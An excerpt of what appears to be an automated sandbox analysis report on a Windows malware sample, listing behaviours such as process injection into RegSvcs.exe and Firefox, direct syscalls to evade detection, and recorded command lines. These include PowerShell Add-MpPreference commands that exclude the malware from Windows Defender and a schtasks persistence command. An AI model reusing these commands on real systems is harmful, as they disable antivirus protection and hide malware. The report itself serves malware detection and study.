                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F78B28 mov eax, dword ptr fs:[00000030h]7_2_00F78B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F78B28 mov eax, dword ptr fs:[00000030h]7_2_00F78B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2EB1D mov eax, dword ptr fs:[00000030h]7_2_00F2EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84B00 mov eax, dword ptr fs:[00000030h]7_2_00F84B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2CF0 mov eax, dword ptr fs:[00000030h]7_2_00EE2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EACCC8 mov eax, dword ptr fs:[00000030h]7_2_00EACCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8CD0 mov eax, dword ptr fs:[00000030h]7_2_00EA8CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov ecx, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov eax, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov eax, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2CCA0 mov eax, dword ptr fs:[00000030h]7_2_00F2CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED8CB1 mov eax, dword ptr fs:[00000030h]7_2_00ED8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED8CB1 mov eax, dword ptr fs:[00000030h]7_2_00ED8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8C8D mov eax, dword ptr fs:[00000030h]7_2_00EA8C8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE4C59 mov eax, dword ptr fs:[00000030h]7_2_00EE4C59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBAC50 mov eax, dword ptr fs:[00000030h]7_2_00EBAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6C50 mov eax, dword ptr fs:[00000030h]7_2_00EB6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6C50 mov eax, dword ptr fs:[00000030h]7_2_00EB6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6C50 mov eax, dword ptr fs:[00000030h]7_2_00EB6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54C34 mov eax, dword ptr fs:[00000030h]7_2_00F54C34
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtTerminateThread: Direct from: 0x77D32FCC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtSetInformationThread: Direct from: 0x77D263F9
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtQueryInformationToken: Direct from: 0x77D32CAC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtCreateFile: Direct from: 0x77D32FEC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtOpenFile: Direct from: 0x77D32DCC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtSetInformationProcess: Direct from: 0x77D32C5C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtProtectVirtualMemory: Direct from: 0x77D32F9C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtOpenKeyEx: Direct from: 0x77D32B9C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtResumeThread: Direct from: 0x77D336AC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtMapViewOfSection: Direct from: 0x77D32D1C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtWriteVirtualMemory: Direct from: 0x77D32E3C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtCreateMutant: Direct from: 0x77D335CC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtNotifyChangeKey: Direct from: 0x77D33C2C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtQuerySystemInformation: Direct from: 0x77D32DFC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtReadFile: Direct from: 0x77D32ADC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtAllocateVirtualMemory: Direct from: 0x77D32BFC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtCreateUserProcess: Direct from: 0x77D3371C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtQueryInformationProcess: Direct from: 0x77D32C26
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtResumeThread: Direct from: 0x77D32FBC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtDelayExecution: Direct from: 0x77D32DDC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtQueryAttributesFile: Direct from: 0x77D32E6C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtSetInformationThread: Direct from: 0x77D32B4C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtReadVirtualMemory: Direct from: 0x77D32E8C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtCreateKey: Direct from: 0x77D32C6C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtClose: Direct from: 0x77D32B6C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtAllocateVirtualMemory: Direct from: 0x77D33C9C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtWriteVirtualMemory: Direct from: 0x77D3490C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtOpenSection: Direct from: 0x77D32E0C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtQueryVolumeInformationFile: Direct from: 0x77D32F2C
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtTerminateThread: Direct from: 0x77D27B2E
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtAllocateVirtualMemory: Direct from: 0x77D348EC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtAllocateVirtualMemory: Direct from: 0x77D32BEC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtDeviceIoControlFile: Direct from: 0x77D32AEC
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeNtQuerySystemInformation: Direct from: 0x77D348CC
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread register set: target process: 4076
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread APC queued: target process: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 614008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB1008Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: nufnwZ9IW.exe, 0000000D.00000002.3313215748.0000000001631000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000000.1014075405.0000000001630000.00000002.00000001.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158354600.0000000001A70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeQueries volume information: C:\Users\user\Desktop\0t7MXNEfCg.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
